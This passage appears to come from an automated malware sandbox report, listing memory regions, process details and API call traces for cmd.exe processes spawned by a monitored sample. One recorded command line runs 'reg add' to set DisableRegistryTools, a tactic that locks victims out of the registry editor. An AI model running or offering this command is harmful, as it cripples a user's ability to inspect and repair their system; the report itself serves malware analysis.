start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2392 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2393 start_va = 0x870000 end_va = 0x9f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 2394 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 2395 start_va = 0xb90000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 2396 start_va = 0x1f90000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2397 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2398 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2399 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2400 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2401 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2402 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2403 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2404 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2405 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2406 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2407 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2408 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2409 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2410 start_va = 0x2180000 end_va = 0x24b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2411 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2412 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2413 start_va = 0x80000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2414 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2415 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2416 start_va = 0x24c0000 end_va = 0x26dbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 2417 start_va = 0x26e0000 end_va = 0x28f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 2418 start_va = 0x1f90000 end_va = 0x20a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2419 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 2420 start_va = 0x2900000 end_va = 0x2b18fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2421 start_va = 0x2b20000 end_va = 0x2c30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 2422 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2423 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2424 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2425 start_va = 0x680000 end_va = 0x73bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 2426 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2427 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2428 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2429 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2430 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2431 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2432 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2433 start_va = 0x740000 end_va = 0x744fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2434 start_va = 0x760000 end_va = 0x760fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2435 start_va = 0x20b0000 end_va = 0x20b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 2436 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2437 start_va = 0x20c0000 end_va = 0x20c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2438 start_va = 0x20d0000 end_va = 0x20d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020d0000" filename = "" Thread: id = 172 os_tid = 0x2dc Thread: id = 173 os_tid = 0x7cc Thread: id = 174 os_tid = 0x7c0 Thread: id = 175 os_tid = 0x7b0 Process: id = "27" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xb18000" os_pid = "0x578" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2482 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2483 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2484 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2485 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2486 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2487 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2488 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2489 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2490 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2491 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2492 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 2493 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2494 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2495 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2496 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2497 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2498 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2499 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2500 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2501 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2502 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2503 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2504 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2505 start_va = 0x400000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2506 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2507 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2508 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2509 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2591 start_va = 0x5f0000 end_va = 0x6adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2592 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2593 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2594 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2595 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2596 start_va = 0x7b0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 2597 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2598 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2599 start_va = 0x850000 end_va = 0xb86fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 177 os_tid = 0xe04 [0276.012] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0276.012] __set_app_type (_Type=0x1) [0276.012] __p__fmode () returned 0x74ac4d6c [0276.012] __p__commode () returned 0x74ac5b1c [0276.012] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0276.012] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0276.013] GetCurrentThreadId () returned 0xe04 [0276.013] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe04) returned 0x84 [0276.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0276.013] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0276.013] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.034] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0276.035] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0276.035] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0276.035] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0276.035] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0276.035] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0276.035] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0276.035] GetConsoleOutputCP () returned 0x1b5 [0276.044] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0276.044] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0276.044] _get_osfhandle (_FileHandle=1) returned 0x3c [0276.044] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0276.053] _get_osfhandle (_FileHandle=1) returned 0x3c [0276.053] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0276.060] _get_osfhandle (_FileHandle=1) returned 0x3c [0276.060] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0276.067] _get_osfhandle (_FileHandle=0) returned 0x38 [0276.067] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0276.074] _get_osfhandle (_FileHandle=0) returned 0x38 [0276.074] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0276.082] GetEnvironmentStringsW () returned 0x4b7e00* [0276.082] GetProcessHeap () returned 0x4b0000 [0276.082] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa1a) returned 0x4b8828 [0276.082] FreeEnvironmentStringsA (penv="A") returned 1 [0276.082] GetProcessHeap () returned 0x4b0000 [0276.082] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x4) returned 0x4b0550 [0276.082] GetEnvironmentStringsW () returned 0x4b7e00* [0276.082] GetProcessHeap () returned 0x4b0000 [0276.082] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa1a) returned 0x4b9250 [0276.083] FreeEnvironmentStringsA (penv="A") returned 1 [0276.083] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0276.083] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0276.083] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0276.083] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0276.083] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0276.083] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0276.083] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0276.083] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0276.083] RegCloseKey (hKey=0x94) returned 0x0 [0276.084] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0276.084] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0276.084] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0276.084] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0276.084] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0276.084] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0276.084] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0276.084] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0276.084] RegCloseKey (hKey=0x94) returned 0x0 [0276.084] time (in: timer=0x0 | out: timer=0x0) returned 0x620b7530 [0276.084] srand (_Seed=0x620b7530) [0276.084] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f" [0276.085] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f" [0276.085] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0276.085] GetProcessHeap () returned 0x4b0000 [0276.085] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x210) returned 0x4b9c78 [0276.085] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b9c80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0276.085] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0276.085] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0276.085] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0276.085] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0276.085] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0276.085] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0276.085] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0276.085] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0276.085] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0276.085] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0276.085] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 